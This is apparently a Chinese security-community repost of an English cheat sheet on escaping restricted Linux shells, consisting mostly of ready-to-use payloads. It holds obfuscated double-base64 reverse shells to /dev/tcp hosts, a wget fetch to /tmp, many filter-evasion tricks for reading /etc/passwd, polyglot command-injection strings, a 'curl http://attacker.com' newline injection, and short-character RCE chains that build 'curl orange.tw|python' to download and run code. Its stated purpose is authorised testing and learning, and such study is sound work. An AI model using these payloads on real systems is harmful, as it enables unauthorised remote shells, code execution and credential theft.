免责声明

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

只供对已授权的目标使用测试，对未授权目标的测试作者不承担责任，均由使用本人自行承担。

文章正文

Bypass Linux Shell Restrictions

Common Limitations Bypasses

Reverse Shell

# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time

echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'

#echoWW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h

Short Rev shell

#Trick from Dikline

#Get a rev shell with

(sh)0>/dev/tcp/10.10.10.10/443

#Then get the out of the rev shell executing inside of it:

exec >&0

Bypass Paths and forbidden words

# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost


# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami


# Wildcard + local directory arguments
touch -- -la # -- stops processing options after the --
ls *


# [chars]
/usr/bin/n[c] # /usr/bin/nc


# Quotes
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64


#Backslashes
uname -a # uname -a
/bin/////sh


# $@
who$@ami #whoami


# Transformations (case, reverse, base64)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
$(rev<<<'imaohw') #whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64


# Execution through $0
echo whoami|$0


# Uninitialized variables: A uninitialized variable equals to null (nothing)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters


# Fake commands
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown


# Concatenation of strings using history
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami

Bypass forbidden spaces

# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test


# IFS - Internal field separator, change " " for any other character ("]" in this case)
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd


# Put the command line in a variable and then execute it
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice

#  Other way, just change each space for ${IFS}
echo${IFS}test


# Using hex format
X=$'catx20/etc/passwd'&&$X


# Using tabs
echo "lsx09-l" | bash


# New lines
p
i
n
g # These 4 lines will equal to ping


# Undefined variables and !
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1-a # This equals to uname -a

Bypass backslash and slash

cat ${HOME:0:1}etc${HOME:0:1}passwd

cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Bypass pipes

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Bypass with hex encoding

echo -e "x2fx65x74x63x2fx70x61x73x73x77x64"

cat `echo -e "x2fx65x74x63x2fx70x61x73x73x77x64"`

abc=$'x2fx65x74x63x2fx70x61x73x73x77x64';cat abc

`echo $'catx20x2fx65x74x63x2fx70x61x73x73x77x64'`

cat `xxd -r -p <<< 2f6574632f706173737764`

xxd -r -ps <(echo 2f6574632f706173737764)

cat `xxd -r -ps <(echo 2f6574632f706173737764)`

Bypass IPs

# Decimal IPs

127.0.0.1 == 2130706433

Time based data exfiltration

time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi

Getting chars from Env Variables

echo ${LS_COLORS:10:1} #;

echo ${PATH:0:1} #/

DNS data exfiltration

You could use burpcollab or pingb^[1] for example.

Builtins

In case you cannot execute external functions and only have access to a limited set of builtins to obtain RCE, there are some handy tricks to do it. Usually you won't be able to use all of the builtins, so you should know all your options to try to bypass the jail. Idea from devploit^[2]. First of all check all the shell builtins^[3]. Then here you have some recommendations:

# Get list of builtins
declare builtins

# In these cases PATH won't be set, so you can try to set it
PATH="/bin" /bin/ls
export PATH="/bin"
declare PATH="/bin"
SHELL=/bin/bash


# Hex
$(echo -e "x2fx62x69x6ex2fx6cx73")
$(echo -e "x2fx62x69x6ex2fx6cx73")


# Input
read aaa; exec $aaa #Read more commands to execute and execute them
read aaa; eval $aaa


# Get "/" char using printf and env vars
printf %.1s "$PWD"
## Execute /bin/ls
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
## To get several letters you can use a combination of printf and
declare
declare functions
declare historywords


# Read flag in current dir
source f*
flag.txt:1: command not found: CTF{asdasdasd}


# Read file with read
while read -r line; do echo $line; done < /etc/passwd


# Get env variables
declare


# Get history
history
declare history
declare historywords

Polyglot command injection

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}

/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

Bypass potential regexes

# A regex that only allow letters and numbers migth be vulnerable to new line characters

1%0a`curl http://attacker.com

RCE with 5 chars

# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
#Oragnge Tsai solution
## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
http://host/?cmd=>ls
http://host/?cmd=ls>_
http://host/?cmd=> 
http://host/?cmd=>-t
http://host/?cmd=>>g
http://host/?cmd=ls>>_

## Step2: generate `curl orange.tw|python` to file "g"
## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
http://host/?cmd=>on
http://host/?cmd=>th
http://host/?cmd=>py
http://host/?cmd=>|
http://host/?cmd=>tw
http://host/?cmd=>e.
http://host/?cmd=>ng
http://host/?cmd=>ra
http://host/?cmd=>o
http://host/?cmd=> 
http://host/?cmd=>rl
http://host/?cmd=>cu
http://host/?cmd=sh _

# Note that a "" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file

## Finally execute the file "g"
http://host/?cmd=sh g


# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
## Execute tar command over a folder
http://52.199.204.34/?cmd=>tar
http://52.199.204.34/?cmd=>zcf
http://52.199.204.34/?cmd=>zzz
http://52.199.204.34/?cmd=*%20/h*


# Another curiosity if you can read files of the current folder
ln /f*
## If there is a file /flag.txt that will create a hard link 
## to it in the current folder

RCE with 4 chars

# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
# it will follow the same principle of creating the command `ls -t>g` in a file
# and then generate the full command in filenames
# generate "g> ht- sl" to file "v"
'>dir'
'>sl'
'>g>'
'>ht-'
'*>v'


# reverse file "v" to file "x", content "ls -th >g"
'>rev'
'*v>x'


# generate "curl orange.tw|python;"
'>;\'
'>on\'
'>th\'
'>py\'
'>|\'
'>tw\'
'>e.\'
'>ng\'
'>ra\'
'>o\'
'> \'
'>rl\'
'>cu\'

# got shell
'sh x'
'sh g'

Read-Only/Noexec Bypass

If you are inside a filesystem with the read-only and noexec protections there are still ways to execute arbitrary binaries. One of them is by the use of DDexec, yo can find an explanation of the technique in:

https://github.com/arget13/DDexec

引用链接

[1] pingb: http://pingb.in/
[2] devploit: https://twitter.com/devploit
[3] shell builtins: https://www.gnu.org/software/bash/manual/html_node/Shell-Builtin-Commands.html

技术交流

知识星球

致力于红蓝对抗，实战攻防，星球不定时更新内外网攻防渗透技巧，以及最新学习研究成果等。常态化更新最新安全动态。专题更新奇技淫巧小Tips及实战案例。

涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全。星球中已发布 200+ 安全资源，针对网络安全成员的普遍水平，并为星友提供了教程、工具、POC&EXP以及各种学习笔记等等。

交流群

关注公众号回复“加群”，添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。

关注我们

关注福利：

回复“app" 获取  app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理，收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

往期文章

我是如何摸鱼到红队的

命令执行漏洞[无]回显[不]出网利用技巧

MSSQL提权全总结

Powershell 免杀过 defender 火绒，附自动化工具

一篇文章带你学会容器逃逸

域渗透 | kerberos认证及过程中产生的攻击

通过DCERPC和ntlmssp获取Windows远程主机信息

原文始发于微信公众号（Z2O安全攻防）：Bypass Linux Shell Restrictions